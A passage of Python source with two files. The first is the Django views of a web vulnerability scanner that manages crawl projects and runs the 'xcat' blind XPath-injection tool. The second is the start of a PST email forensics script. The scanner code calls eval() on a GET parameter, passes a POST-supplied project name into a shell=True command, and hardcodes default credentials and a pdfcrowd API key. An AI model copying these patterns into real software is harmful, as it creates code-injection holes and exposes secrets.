    not a valid Django response object — confirm intended.
    """
    try:
        if request.method == "GET":
            return render_to_response("settings.html", {
                'page': 'settings',
                'settings': get_renderable_settings()
            }, context_instance=RequestContext(request))
        elif request.method == "POST":
            save_settings(get_new_settings(request))
            return render_to_response("settings.html", {
                'page': 'settings',
                'settings': get_renderable_settings(),
                'updated': True
            }, context_instance=RequestContext(request))
    except:
        return "error"
def get_new_settings(request):
    """Extract the scanner settings submitted in the settings/scan form
    into a plain dict (list-valued crawl options, plus auth strings).

    Returns the dict, or the string "error" on any failure (convention
    used throughout this module).
    """
    try:
        a = {}
        a['consider_only'] = []
        for i in request.POST.getlist('toConsider[]'):
            a['consider_only'].append(str(i.strip()))
        a['exclude'] = []
        # Comma-separated free-text fields are split and trimmed.
        for i in str(request.POST['toExclude']).split(','):
            a['exclude'].append(str(i.strip()))
        a['allowed_extensions'] = []
        for i in str(request.POST['allowedExtensions']).split(','):
            a['allowed_extensions'].append(str(i.strip()))
        a['allowed_protocols'] = []
        for i in request.POST.getlist('allowedProtocols[]'):
            a['allowed_protocols'].append(str(i.strip()))
        # The list initialisations below are immediately overwritten with
        # scalar strings.
        a['username'] = []
        a['username'] = request.POST['toAuthUsername']
        a['password'] = []
        a['password'] = request.POST['toAuthPassword']
        a['auth_mode'] = []
        a['auth_mode'] = request.POST['toAuthMode']
        return a
    except:
        return "error"
def get_renderable_settings(settings = None):
    """Turn the list-valued settings fields into comma-separated display
    strings for the templates.

    Falls back to the stored settings when none are supplied. Returns the
    (mutated) settings dict, or the string "error" on failure.
    """
    try:
        if not settings:
            settings = get_settings()
        # Only these two fields are flattened here; callers join the
        # remaining list fields themselves.
        for field in ('allowed_extensions', 'exclude'):
            settings[field] = ', '.join(settings[field])
        return settings
    except:
        return "error"
def get_settings():
    """Load the singleton Settings row (pk=1), creating it with defaults
    on first use, and return it as a plain dict with the list-valued
    fields eval()'d back into Python lists.

    Returns the dict, or the string "error" on failure.
    """
    try:
        if Settings.objects.all():
            setting = Settings.objects.get(pk=1)
        else:
            # First run: seed the database with default settings.
            setting = Settings()
            setting.allowed_extensions = "['asp', 'aspx', 'cfm', 'cfml', 'htm', 'html', 'jhtml', 'jsp', 'php', 'php3', 'php4', 'php5', 'phtm', 'phtml', 'pl', 'py', 'shtm', 'shtml', 'txt', 'xht', 'xhtm', 'xhtml', 'xml']"
            setting.allowed_protocols = "['http', 'https']"
            setting.consider_only = "['textareas', 'checkboxes', 'selects', 'inputs']"
            setting.exclude_fields = "['csrftoken', 'csrfmiddlewaretoken']"
            setting.username = "nushafreen"
            setting.password = "nushafreen"
            setting.auth_mode = "Q8fZUKGdyX7zMOkiJfisR2ae26xcWaYs"
            setting.save()
        b = {}
        # NOTE(review): eval() of DB-stored strings — trusted only because
        # this module writes them itself.
        b['allowed_extensions'] = eval(str(setting.allowed_extensions))
        b['allowed_protocols'] = eval(str(setting.allowed_protocols))
        b['consider_only'] = eval(str(setting.consider_only))
        b['exclude'] = eval(str(setting.exclude_fields))
        b['username'] = setting.username
        b['password'] = setting.password
        b['auth_mode'] = setting.auth_mode
        return b
    except:
        return "error"
def save_settings(new_settings):
    """Persist *new_settings* to the singleton Settings row, but only if
    at least one field actually differs from the stored values."""
    try:
        settings = get_settings()
        update = False
        # sorted() makes list comparison order-insensitive.
        for i in settings:
            if sorted(settings[i]) != sorted(new_settings[i]):
                update = True
                settings[i] = new_settings[i]
        if update:
            setting = Settings.objects.get(pk=1)
            # List fields are stored as their repr() strings.
            setting.allowed_extensions = str(new_settings['allowed_extensions'])
            setting.allowed_protocols = str(new_settings['allowed_protocols'])
            setting.consider_only = str(new_settings['consider_only'])
            setting.exclude_fields = str(new_settings['exclude'])
            setting.username = str(new_settings['username'])
            setting.password = str(new_settings['password'])
            setting.auth_mode = str(new_settings['auth_mode'])
            setting.save()
    except:
        # Silently ignore failures; nothing is saved.
        update=False
# def add_new_crawler(request):
# PROJECT_NAME = 'Xtreme1%d' % (random.randint(100, 20000))
# START_URL = 'http://localhost:9090/'
# cmd_line_string = PROJECT_NAME + '$$$' + START_URL
# log_file = open(PROJECT_NAME+'.txt', 'w')
# process = subprocess.Popen('python "%s"' %(RUN_CRAWLER_FILE), shell=True, stdout = log_file, stderr = log_file, stdin = subprocess.PIPE)
# process.stdin.write(cmd_line_string)
# out, err = process.communicate(cmd_line_string)
# process.stdin.close()
# CRAWLERS.append(PROJECT_NAME)
# length = len(CRAWLERS)
# return HttpResponse(str(length) + 'lol check' + cmd_line_string)
def kill_scan(request):
    """Kill the running crawler subprocess for ?project_name=... and mark
    the project STOPPED; renders an alert page describing the outcome."""
    #print("inside kill scan")
    try:
        # lol == True means the project_name parameter was missing/empty.
        lol = False
        try:
            project_name = str(request.GET['project_name'])
            #print("project_name")
            #print(project_name)
            if not len(project_name):
                lol = True
        except:
            lol = True
        if lol:
            return render_to_response('alert.html', {
                'error': True,
                'text': 'Missing Parameter!'
            }, context_instance=RequestContext(request))
        #print(CRAWLERS)
        if project_name in CRAWLERS:
            pro = CRAWLERS[project_name]
            #print('process id in kill')
            #print(pro.pid)
            #print(signal.SIGTERM)
            #os.kill(pro.pid, signal.SIGTERM)
            pro.kill()
            CRAWLERS.pop(project_name)
            project = Project.objects.get(project_name = project_name)
            project.status = STOPPED
            project.save()
            return render_to_response('alert.html', {
                'error': False,
                'text': 'Successfully stopped project scanning'
            }, context_instance=RequestContext(request))
        else:
            return render_to_response('alert.html', {
                'error': True,
                'text': 'The project scanning is already stopped!'
            }, context_instance=RequestContext(request))
    except:
        return "error"
def get_details(request):
    """Render the details page for ?proj_name=..., including its settings
    and crawl statistics; falls back to an alert page when the project is
    unknown. ?update=1 selects the AJAX partial template."""
    # try:
    if True :
        # Side effect: reaps finished crawler processes / updates statuses.
        get_progress()
        if 'proj_name' in request.GET and len(str(request.GET['proj_name'])):
            project_name = str(request.GET['proj_name'])
            if Project.objects.filter(project_name = project_name).count():
                #projectss = Project.objects.filter(project_name__contains= project_name)
                project = Project.objects.get(project_name = project_name)
                setting = {}
                setting['allowed_extensions'] = eval(str(project.allowed_extensions))
                setting['allowed_protocols'] = eval(str(project.allowed_protocols))
                setting['consider_only'] = eval(str(project.consider_only))
                setting['exclude'] = eval(str(project.exclude_fields))
                setting['username'] = project.username
                setting['password'] = project.password
                setting['auth_mode'] = project.auth_mode
                a = get_renderable_settings(setting)
                a['allowed_protocols'] = ', '.join(a['allowed_protocols'])
                a['consider_only'] = ', '.join(a['consider_only'])
                urls_found = project.get_no_of_urls_discovered()
                urls_processed = project.get_no_urls_processed()
                vulns_found = project.get_vulnerabilities_found()
                percentage = 0
                if urls_found>0:
                    percentage = urls_processed * 100/urls_found
                # 'just' flags a freshly-created project (welcome banner).
                if 'just' in request.GET and str(request.GET['just']) == 'true':
                    just = True
                else:
                    just = False
                if 'update' in request.GET and str(request.GET['update']) =='1':
                    template = 'details_update.html'
                else:
                    template = 'details.html'
                return render_to_response(template, {
                    'project': project,
                    'settings': a,
                    'page': 'reports',
                    'urls_found': urls_found,
                    'urls_processed': urls_processed,
                    'vulns_found': vulns_found,
                    'percentage': percentage,
                    'just': just
                }, context_instance=RequestContext(request))
        return render_to_response('alert.html', {
            'error': True,
            'text': 'Your search didn\'t give any results. Please check the overview section for your project.'
        }, context_instance=RequestContext(request))
    #except:
    #return "error"
def blind_scan(request):
    """POST: persist a BlindProject row and launch the `xcat` blind
    XPath-injection tool against the target in the background, then
    redirect to the detail page. GET: render the blank blind-scan form.
    """
    if request.method == "POST":
        project_name = request.POST['projectName']
        public_IP = request.POST['publicIP']
        blind_URL = request.POST['blindURL']
        method = request.POST['method']
        param_name = request.POST['paramName']
        param_value = request.POST['paramValue']
        match_string = request.POST['matchString']
        #create project blind and save to db
        blind_proj = BlindProject()
        blind_proj.project_name = project_name
        blind_proj.public_IP = public_IP
        blind_proj.method = method
        blind_proj.blind_URL = blind_URL
        blind_proj.param_name = param_name
        blind_proj.param_value = param_value
        blind_proj.match_string = match_string
        blind_proj.project_status = 'In Progress'
        blind_proj.success_flg = 'N'
        blind_proj.save()
        log_file = open(project_name + '_blindLog.txt', 'a')
        # SECURITY FIX: the command was previously assembled as one shell
        # string from raw POST fields and run with shell=True, allowing
        # shell command injection via any form field. Passing an argv list
        # with shell=False hands xcat the same arguments (the quoting the
        # shell string used) without involving a shell at all.
        process = subprocess.Popen(['xcat',
                                    '--public-ip=' + public_IP,
                                    '--method=' + method,
                                    blind_URL,
                                    param_name + '=' + param_value,
                                    param_name,
                                    match_string,
                                    'run', 'retrieve'],
                                   shell=False,
                                   stdout = log_file,
                                   stderr = log_file,
                                   stdin = subprocess.PIPE)
        process_id = process.pid
        return HttpResponseRedirect("/blind_details?projectName=%s&page='blind_scan'&processID=%s" % (project_name,process_id))
    else:
        return render_to_response("blind.html", {
            'page': 'blind_scan',
        }, context_instance=RequestContext(request))
def blind_details(request):
    """Render the blind-scan detail page, polling the xcat process (via
    psutil) and, once it has exited, grading the scan from the last log
    line."""
    project_name = request.GET['projectName']
    if 'processID' in request.GET:
        # NOTE(review): eval() on a GET parameter — code injection risk;
        # int() would suffice here.
        process_id = eval(request.GET['processID'])
        project = BlindProject.objects.get(project_name = project_name)
        #project = request.POST['project']
        p = psutil.Process(process_id)
        print(p.status)
        #process has terminated, check log for result of xpath scan
        if(p.status!='sleeping' and p.status!='running'):
            line = subprocess.check_output(['tail', '-1', project_name + '_blindLog.txt'])
            if 'Successfully retrieved XML' in line:
                BlindProject.objects.filter(project_name =
                    project_name).update(project_status = 'Completed',success_flg='T')
            else:
                BlindProject.objects.filter(project_name =
                    project_name).update(project_status = 'Completed',success_flg='F')
        return render_to_response('blind_details.html', {
            'page': 'blind_details',
            'project': BlindProject.objects.get(project_name = project_name),
            'processID': process_id,
        }, context_instance=RequestContext(request))
    else:
        return render_to_response('blind_details.html', {
            'page': 'blind_details',
            'project': BlindProject.objects.get(project_name = project_name),
        }, context_instance=RequestContext(request))
def blind_report(request):
    """With ?projectName=... render that project's full xcat log; without
    it, render the list of completed blind projects to choose from."""
    if 'projectName' in request.GET and len(request.GET['projectName']):
        project_name = request.GET['projectName']
        project =BlindProject.objects.get(project_name = project_name)
        report_lines = []
        # The whole log is read into memory line-by-line for the template.
        with open(project_name+'_blindLog.txt', 'r') as f:
            for line in f.readlines():
                report_lines.append(str(line))
        return render_to_response("blind_report.html", {
            'page' : 'blind_report',
            'project' : project,
            'reportLines' : report_lines,
        }, context_instance=RequestContext(request))
    else:
        projects = BlindProject.objects.all()
        proj = []
        for project in projects:
            if project.project_status == 'Completed':
                proj.append(project.project_name)
        return render_to_response('blind_report.html', {
            'page': 'blind_report',
            'projectnames':proj,
        }, context_instance=RequestContext(request))
def resume_scan(request):
    """With ?projectName=... render the resume form pre-filled with that
    project's stored settings; without it, render the list of projects
    that are not currently running."""
    try:
        got_option = False
        try:
            if 'projectName' in request.GET and len(request.GET['projectName']):
                got_option = True
                project_name = request.GET['projectName']
        except:
            return HttpResponseRedirect('/resume')
        if got_option:
            try:
                project = Project.objects.get(project_name = project_name)
            except:
                project = None
            a = []
            if not project:
                error = True
            else:
                error = False
                # Second fetch is redundant but harmless.
                project = Project.objects.get(project_name = project_name)
                setting = {}
                setting['allowed_extensions'] = eval(str(project.allowed_extensions))
                setting['allowed_protocols'] = eval(str(project.allowed_protocols))
                setting['consider_only'] = eval(str(project.consider_only))
                setting['exclude'] = eval(str(project.exclude_fields))
                a = get_renderable_settings(setting)
                a['allowed_protocols'] = ', '.join(a['allowed_protocols'])
                a['consider_only'] = ', '.join(a['consider_only'])
            return render_to_response('resume.html', {
                'page': 'resume_scan',
                'details': a,
                'project':project,
                'error': error,
            }, context_instance=RequestContext(request))
        projects = Project.objects.all()
        proj = []
        for project in projects:
            if project.status != IN_PROGRESS:
                proj.append(str(project.project_name))
        return render_to_response('resume.html', {
            'page': 'resume_scan',
            'projects':proj,
        }, context_instance=RequestContext(request))
    except:
        return "error"
def modify_scan(request):
    """POST: update an existing Project in place, optionally purge its
    crawled pages/forms (?force), then relaunch the crawler subprocess
    and redirect to the details page. Non-POST requests redirect home."""
    #try:
    if request.method == "POST":
        # Fall back to stored settings if form settings fail to parse.
        try:
            settings = get_new_settings(request)
        except:
            settings = get_settings()
        project_name = str(request.POST['projectName'])
        start_url = str(request.POST['startURL'])
        query_url = str(request.POST['startURL'])
        login_url = str(request.POST['loginURL'])
        logout_url = str(request.POST['logoutURL'])
        username_field=str(request.POST['toAuthUsernameField'])
        username=str(request.POST['toAuthUsername'])
        password_field=str(request.POST['toAuthPasswordField'])
        password=str(request.POST['toAuthPassword'])
        auth_parameters=str(request.POST['authParameters'])
        auth_mode=str(request.POST['toAuthMode'])
        # Unlike new_scan(), the project must already exist here.
        if Project.objects.filter(project_name = project_name).count() == 1:
            lol = True
        else:
            lol = False
        if not project_name or not start_url or not query_url or not lol:
            return render_to_response('alert.html', {
                'error': True,
                'text': 'Nice Try!'
            }, context_instance=RequestContext(request))
        else:
            Project.objects.filter(project_name =
                project_name).update(status = IN_PROGRESS,
                start_url = start_url,
                query_url = query_url,
                login_url = login_url,
                logout_url = logout_url,
                allowed_extensions = str(settings['allowed_extensions']),
                allowed_protocols = str(settings['allowed_protocols']),
                consider_only = str(settings['consider_only']),
                exclude_fields = str(settings['exclude']),
                username = username,
                password = password,
                auth_mode = auth_mode,
                username_field = username_field,
                password_field = password_field,
                auth_parameters = auth_parameters)
            project = Project.objects.get(project_name = project_name)
            # Did the user ask us to remember the settings?
            if 'remember' in request.POST and len(str(request.POST['remember'])):
                save_settings(settings)
            # ?force wipes every previously crawled page/form of the project.
            if 'force' in request.POST and len(str(request.POST['force'])):
                print 'forcing'
                Page.objects.filter(project = project).delete()
                Form.objects.filter(project = project).delete()
            # Always re-crawl the start URL from scratch.
            if Page.objects.filter(URL = start_url, project = project).count():
                Page.objects.filter(URL = start_url, project = project).delete()
                Form.objects.filter(form_found_on = start_url, project = project).delete()
            cmd_str = project_name
            log_file = open(project_name+'.txt', 'a')
            process = subprocess.Popen('python "%s" "%s"' %(RUN_CRAWLER_FILE, cmd_str),
                shell=True,
                stdout = log_file,
                stderr = log_file,
                stdin = subprocess.PIPE)
            CRAWLERS[project_name] = process
            return HttpResponseRedirect("/details?proj_name=%s&mod=True" % (project_name))
    else:
        return HttpResponseRedirect('/')
    # except:
    #return "error"
def display_reports(request):
    """With ?projectName=... render the vulnerability report page for
    that project (settings, counters, vulnerable forms); without it,
    render the list of finished projects to choose from."""
    try:
        got_option = False
        try:
            if 'projectName' in request.GET and len(request.GET['projectName']):
                got_option = True
                project_name = request.GET['projectName']
        except:
            return HttpResponseRedirect('/reports')
        if got_option:
            try:
                project = Project.objects.get(project_name = project_name)
            except:
                project = None
            det = []
            if not project:
                error = True
            else:
                error = False
                #with open(project_name+'.txt', 'r') as f:
                #    det = parse_reports(f.readlines())
                project = Project.objects.get(project_name = project_name)
                setting = {}
                setting['allowed_extensions'] = eval(str(project.allowed_extensions))
                setting['allowed_protocols'] = eval(str(project.allowed_protocols))
                setting['consider_only'] = eval(str(project.consider_only))
                setting['exclude'] = eval(str(project.exclude_fields))
                setting['username'] = project.username
                setting['password'] = project.password
                setting['auth_mode'] = project.auth_mode
                a = get_renderable_settings(setting)
                a['allowed_protocols'] = ', '.join(a['allowed_protocols'])
                a['consider_only'] = ', '.join(a['consider_only'])
                urls_found = project.get_no_of_urls_discovered()
                urls_processed = project.get_no_urls_processed()
                vulns_found = project.get_vulnerabilities_found()
            # Ordering matters: get_parsed_vulns() rebuilds the module
            # globals that get_counters()/get_vulnerebleForms() read.
            return render_to_response('reports.html', {
                'option_given': True,
                'page': 'reports',
                #'details': det,
                'project': project,
                'settings': a,
                'vulns': get_parsed_vulns(project_name),
                'urls_found': urls_found,
                'urls_processed': urls_processed,
                'vulns_found': vulns_found,
                'error': error,
                'counters':get_counters(),
                'list_vul':List_vuln,
                'report_string':Report_string,
                'vul_forms':get_vulnerebleForms(),
            }, context_instance=RequestContext(request))
        projects = Project.objects.all()
        proj = []
        for project in projects:
            if project.status != IN_PROGRESS:
                proj.append(str(project.project_name))
        return render_to_response('reports.html', {
            'page': 'reports',
            'projects':proj,
        }, context_instance=RequestContext(request))
    except:
        return "error"
def generate_pdf_view(request):
    """Render the 'PDF generated' page for ?projectName=...

    The actual PDF conversion (pdfcrowd / pdfkit / enscript variants) is
    disabled below; only the confirmation template is rendered.
    """
    try:
        """
        try:
            # create an API client instance
            client = pdfcrowd.Client("nushafreen", "1a1dd7a47f7506742c64a949e9a108f7")
            print(request.GET)
            if 'projectName' in request.GET and len(request.GET['projectName']):
                got_option = True
                project_name = request.GET['projectName']
            # convert a web page and store the generated PDF to a variable
            #pdf = client.convertURI("/reports?projectName=%s" %(project_name))
            output_file = open('%s/XtremeWebAPP/%s.pdf' %(MANAGE_FILE_FOLDER,str(project_name)), 'wb')
            client.convertFile('%s/XtremeWebAPP/%s_report.html' %(MANAGE_FILE_FOLDER,str(project_name)), output_file)
            output_file.close()
            # set HTTP response headers
            response = HttpResponse(mimetype="application/pdf")
            response["Cache-Control"] = "max-age=0"
            response["Accept-Ranges"] = "none"
            response["Content-Disposition"] = "attachment; filename=%s/XtremeWebAPP/%s.pdf" %(MANAGE_FILE_FOLDER,str(project_name))
            # send the generated PDF
            #response.write(pdf)
            response.write(output_file)
        except pdfcrowd.Error, why:
            response = HttpResponse(mimetype="text/plain")
            response.write(why)
        return response
        """
        if 'projectName' in request.GET and len(request.GET['projectName']):
            project_name = request.GET['projectName']
            #pdfkit.from_file('%s/XtremeWebAPP/%s_report.txt' %(MANAGE_FILE_FOLDER,str(project_name)), '%s/XtremeWebAPP/%s.pdf' %(MANAGE_FILE_FOLDER,str(project_name)))
            #subprocess.check_call('enscript %s/XtremeWebAPP/%s_report.txt -o - | ps2pdf - %s/XtremeWebAPP/%s.pdf' %(MANAGE_FILE_FOLDER,str(project_name),MANAGE_FILE_FOLDER,str(project_name)) , shell=True)
            return render_to_response('generatedpdf.html', {
                'project_name':str(project_name)
            }, context_instance=RequestContext(request))
    except:
        return "error"
def parse_reports(report_lines):
    """Parse crawler log lines of the form '[timestamp] - TYPE: message'
    into a list of dicts with keys 'timestamp', 'msg_type' and 'msg'.

    Returns the string "error" on malformed input (module convention).
    The original bare ``except:`` swallowed every exception (including
    SystemExit/KeyboardInterrupt); only ValueError — raised when a line
    lacks the ' - ' or ':' separator — is treated as a parse failure now.
    """
    try:
        parsed_report = []
        for line in report_lines:
            timestamp, remaining = line.split(' - ', 1)
            msg_type, msg = remaining.split(':', 1)
            parsed_report.append({
                'timestamp': timestamp.strip()[1:-1],  # drop surrounding [ ]
                'msg_type': msg_type.strip(),
                'msg': msg.strip(),
            })
        return parsed_report
    except ValueError:
        return "error"
def get_parsed_vulns(project_name):
    """Load the project's Vulnerability rows, de-duplicate them, and
    rebuild the module-level report state (COUNTERS, details, urll, msg,
    timestamp, Forms/Form_list) that get_counters() and
    get_vulnerebleForms() read afterwards.

    Returns the de-duplicated vulnerability list, or "error" on failure.
    """
    try:
        #global COUNTERS
        #COUNTERS={}
        #global details={}
        # global urll={}
        #global msg={}
        #timestamp={}
        global Form_list
        Form_list=[]
        i=0
        count=0
        # Reset every per-vulnerability-type accumulator.
        while i <Len_List_vect :
            COUNTERS[List_vuln[i]]=count
            details[List_vuln[i]]="Details :\n"
            urll[List_vuln[i]]="Urls : \n"
            msg[List_vuln[i]]=""
            timestamp[List_vuln[i]]=""
            i+=1
        #print "counters are "+str(COUNTERS)
        i=0
        vulns = Vulnerability.objects.filter(project = project_name) #returns all rows,in form of dictionary i.e key and value
        # Drop duplicates that differ only in the auth flag.
        vulnsList=[]
        for vuln in vulns:
            flg=0
            for v in vulnsList:
                if v.url == vuln.url and v.form.input_field_list == vuln.form.input_field_list and v.re_attack == vuln.re_attack and v.auth!=vuln.auth:
                    flg=1
                    break
            if flg==0:
                vulnsList.append(vuln)
        #vulnsList.sort()
        # Accumulate counters and report text per vulnerability type.
        for v_stored in vulnsList:
            for v in List_vuln :
                #print("message is " + v_stored.msg_type)
                if v_stored.msg_type == v :
                    COUNTERS[v]+=1
                    details[v]=""+str(details[v])+"\n Description : "+str(v_stored.msg_type)+"\n\n"+"URL : "+str(v_stored.url)+"\n\n"+"Form name : "+str(v_stored.form.form_name)+"\nMethod : "+str(v_stored.form.form_method)+"\nAction : "+str(v_stored.form.form_action)+"\n\n"+"Malicious Query : \n"+str(v_stored.details)+"\n"
                    details[v]=""+str(details[v])+"--------------------------------------------------------------------------------------------------------------------"
                    urll[v]=str(urll[v])+"\n"+str(v_stored.url)+"\n"
                    timestamp[v]=str(timestamp[v])+"\n"+str(v_stored.timestamp)+"\n"
                    #print v_stored.timestamp
                    msg[v]=str(msg[v])+"\n"+str(v_stored.msg)+"\n"
                    Forms.append("\n URL : "+str(v_stored.url)+" \n Form name : "+str(v_stored.form.form_name)+"\nMethod : "+str(v_stored.form.form_method)+"\nAction: "+str(v_stored.form.form_action)+"\n")
        # De-duplicate the global Forms list into Form_list.
        for f in Forms:
            flg=0
            for ff in Form_list:
                if ff ==f :
                    flg=1
                    break
            if flg==0:
                Form_list.append(f)
                Form_list.append("--------------------------------------------------------------------------------------------------------------------")
        vulnsList.sort()
        #Forms=Form_list
        print (Form_list)
        return vulnsList
    except:
        return "error"
def get_counters():
    """Build the per-vulnerability counter rows for the report template
    from the module globals populated by get_parsed_vulns(), and rebuild
    the global Report_string HTML table as a side effect.

    Returns the list of row dicts, or "error" on failure.
    """
    try:
        i=1
        temp={}
        global Report_string
        Report_string=""
        links_data=""
        vul_counter=[]
        for line in COUNTERS:
            #print(line)
            #print(str(COUNTERS[line]))
            a = {}
            a['vul_type'] =str(line)
            a['counter_var']=0
            # Non-zero counters get a clickable link revealing details.
            if COUNTERS[line] > 0 :
                links_data="<a href=#! onclick=get_details('"+str(i)+"'); style=text-decoretion:none>"+str(COUNTERS[line])+"</a>"
                other_data=str(details[line])
                urls=str(urll[line])
                #print links_data
                a['vul_no'] =links_data
                a['other_details']=str(other_data)
            else :
                a['vul_no'] = str(COUNTERS[line])
            i+=1
            a['counter_var']+=i
            vul_counter.append(a)
            Report_string+="<tr><td>"+str(timestamp[line])+"</td><td>"+str(line)+"</td><td>"+str(COUNTERS[line])+"</td><td>"+str(details[line])+"</td></tr>"
            #Report_string.append(a)
        Report_string+="</table>"
        #print("hello "+Report_string)
        #vul_counter.sort()
        return vul_counter
    except:
        print "error occured myan "
        return "error"
def get_counterss():
    """Return "<vulnerability> <count>" strings for every known
    vulnerability type present in COUNTERS."""
    try:
        return [str(name) + " " + str(COUNTERS[name])
                for name in List_vuln if name in COUNTERS]
    except:
        return "error"
def get_vulnerebleForms():
    """Expose the module-level list of vulnerable forms built by
    get_parsed_vulns()."""
    try:
        forms = Form_list
    except:
        return "error"
    return forms
def disp404(request):
    """Render the generic not-found alert page (empty string on render
    failure, unlike the "error" convention elsewhere)."""
    context = {
        'error': True,
        'text': 'The page you are looking for is not found! Please help us write it for you by letting us know how you arrived here!'
    }
    try:
        return render_to_response('alert.html', context,
                                  context_instance=RequestContext(request))
    except:
        return ""
def scripts(request):
    """Render script.html with the bootstrap + dashboard CSS concatenated
    into the context, passing through the caller's method_id/content GET
    parameters."""
    try :
        data="a"
        with open(css_folder_file1, 'r') as f:
            #print(f.readlines())
            data=f.read()
        # Append the second stylesheet with newlines stripped.
        with open(css_folder_file2, 'r') as f:
            #print(f.readlines())
            data=data+f.read().replace('\n', '')
        if request.method == "GET":
            # print("page content is "+str(request.GET['content']))
            #with open(css_folder_file2, 'r') as f:
            #print(f.readlines())
            #data=data+f.read().replace('\n', '')
            #os.makedirs(directory)
            return render_to_response("script.html", {
                'page': 'settings',
                'method_id': str(request.GET['method_id']),
                'content':str(request.GET['content']),
                'data':data
            }, context_instance=RequestContext(request))
        elif request.method == "POST":
            #save_settings(get_new_settings(request))
            # NOTE(review): POST still reads method_id/content from
            # request.GET, not request.POST — confirm intended.
            return render_to_response("script.html", {
                'page': 'settings',
                'updated': True,
                'method_id': str(request.GET['method_id']),
                'content':str(request.GET['content']),
                'data':data
            }, context_instance=RequestContext(request))
    except:
        print ("some error ")
        return "error"
| 34.328571 | 325 | 0.555918 |
cybersecurity-penetration-testing | import os
import sys
import argparse
import logging
import jinja2
import pypff
import unicodecsv as csv
from collections import Counter
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20160401'
__version__ = 0.01
__description__ = 'This scripts handles processing and output of PST Email Containers'
# Destination folder for report artefacts; presumably assigned by the CLI
# entry point before main() runs — not visible in this chunk.
output_directory = ""
# Heat-map skeleton: date_list[weekday] is an {hour: count} dict for hours
# 1-24 (xrange => this file targets Python 2).
date_dict = {x:0 for x in xrange(1, 25)}
date_list = [date_dict.copy() for x in xrange(7)]
def main(pst_file, report_name):
    """
    The main function opens a PST and calls functions to parse and report data from the PST

    :param pst_file: A string representing the path to the PST file to analyze
    :param report_name: Name of the report title (if supplied by the user)
    :return: None
    """
    logging.debug("Opening PST for processing...")
    pst_name = os.path.split(pst_file)[1]
    opst = pypff.open(pst_file)
    root = opst.get_root_folder()
    logging.debug("Starting traverse of PST structure...")
    # Walks every folder, writing per-folder CSVs and the intermediate
    # message_body.txt / senders_names.txt files used by the stats below.
    folderTraverse(root)
    logging.debug("Generating Reports...")
    top_word_list = wordStats()
    top_sender_list = senderReport()
    dateReport()
    HTMLReport(report_name, pst_name, top_word_list, top_sender_list)
def makePath(file_name):
    """
    Build the absolute path of *file_name* inside the global output directory.

    :param file_name: A string representing a file name
    :return: A string representing the absolute path to the file
    """
    joined = os.path.join(output_directory, file_name)
    return os.path.abspath(joined)
def folderTraverse(base):
    """
    The folderTraverse function walks through the base of the folder and scans for sub-folders and messages

    :param base: Base folder to scan for new items within the folder.
    :return: None
    """
    for folder in base.sub_folders:
        # Depth-first: recurse into any sub-folders before reporting this one.
        if folder.number_of_sub_folders:
            folderTraverse(folder) # Call new folder to traverse:
        checkForMessages(folder)
def checkForMessages(folder):
    """
    Parse every message in *folder* (if any) and hand the results to the
    per-folder report writer.

    :param folder: pypff.Folder object
    :return: None
    """
    logging.debug("Processing Folder: " + folder.name)
    parsed_messages = [processMessage(msg) for msg in folder.sub_messages]
    folderReport(parsed_messages, folder.name)
def processMessage(message):
    """
    Flatten the interesting fields of a pypff message into a dictionary.

    :param message: pypff.Message object
    :return: dict mapping report field names to the message's values
    """
    # Report key -> pypff attribute name.
    field_map = {
        "subject": "subject",
        "sender": "sender_name",
        "header": "transport_headers",
        "body": "plain_text_body",
        "creation_time": "creation_time",
        "submit_time": "client_submit_time",
        "delivery_time": "delivery_time",
        "attachment_count": "number_of_attachments",
    }
    return {key: getattr(message, attr) for key, attr in field_map.items()}
def folderReport(message_list, folder_name):
    """
    The folderReport function generates a report per PST folder

    Writes a per-folder CSV, appends bodies/senders to the shared
    intermediate text files, and accumulates the weekday/hour histograms
    in the module-global ``date_list``.

    :param message_list: A list of messages discovered during scans
    :folder_name: The name of an Outlook folder within a PST
    :return: None
    """
    if not len(message_list):
        logging.warning("Empty message not processed")
        return
    # CSV Report
    fout_path = makePath("folder_report_" + folder_name + ".csv")
    fout = open(fout_path, 'wb')
    header = ['creation_time', 'submit_time', 'delivery_time',
              'sender', 'subject', 'attachment_count']
    # extrasaction='ignore' drops dict keys (e.g. body/header) not in header.
    csv_fout = csv.DictWriter(fout, fieldnames=header, extrasaction='ignore')
    csv_fout.writeheader()
    csv_fout.writerows(message_list)
    fout.close()
    # HTML Report Prep
    global date_list # Allow access to edit global variable
    body_out = open(makePath("message_body.txt"), 'a')
    senders_out = open(makePath("senders_names.txt"), 'a')
    for m in message_list:
        if m['body']:
            body_out.write(m['body'] + "\n\n")
        if m['sender']:
            senders_out.write(m['sender'] + '\n')
        # Each timestamp bumps its weekday/hour bucket (hours stored 1..24).
        # Creation Time
        day_of_week = m['creation_time'].weekday()
        hour_of_day = m['creation_time'].hour + 1
        date_list[day_of_week][hour_of_day] += 1
        # Submit Time
        day_of_week = m['submit_time'].weekday()
        hour_of_day = m['submit_time'].hour + 1
        date_list[day_of_week][hour_of_day] += 1
        # Delivery Time
        day_of_week = m['delivery_time'].weekday()
        hour_of_day = m['delivery_time'].hour + 1
        date_list[day_of_week][hour_of_day] += 1
    body_out.close()
    senders_out.close()
def wordStats(raw_file="message_body.txt"):
    """
    The wordStats function reads and counts words from a file

    :param raw_file: The path to a file to read
    :return: A list of word frequency counts
    """
    word_list = Counter()
    # Use a context manager so the handle is closed deterministically
    # (the original ``open(...).readlines()`` leaked the file object).
    with open(makePath(raw_file), 'r') as fin:
        for line in fin:
            for word in line.split():
                # Prevent too many false positives/common words
                if word.isalnum() and len(word) > 4:
                    word_list[word] += 1
    return wordReport(word_list)
def wordReport(word_list):
    """
    Write the full word-frequency table to frequent_words.csv and return the
    top ten entries for the HTML dashboard.

    :param word_list: A Counter of words to report on
    :return: None when empty, else a list of {"word", "count"} dicts
    """
    if not word_list:
        logging.debug('Message body statistics not available')
        return
    with open(makePath("frequent_words.csv"), 'wb') as fout:
        fout.write("Count,Word\n")
        for entry in word_list.most_common():
            if len(entry) > 1:
                fout.write(str(entry[1]) + "," + str(entry[0]) + "\n")
    return [{"word": str(w), "count": str(c)} for w, c in word_list.most_common(10)]
def senderReport(raw_file="senders_names.txt"):
    """
    The senderReport function reports the most frequent_senders

    :param raw_file: The file to read raw information
    :return: html_report_list, a list of the most frequent senders
    """
    # Read senders inside a context manager so the input handle is closed
    # (the original ``open(...).readlines()`` leaked the file object).
    with open(makePath(raw_file), 'r') as fin:
        sender_list = Counter(fin.readlines())
    with open(makePath("frequent_senders.csv"), 'wb') as fout:
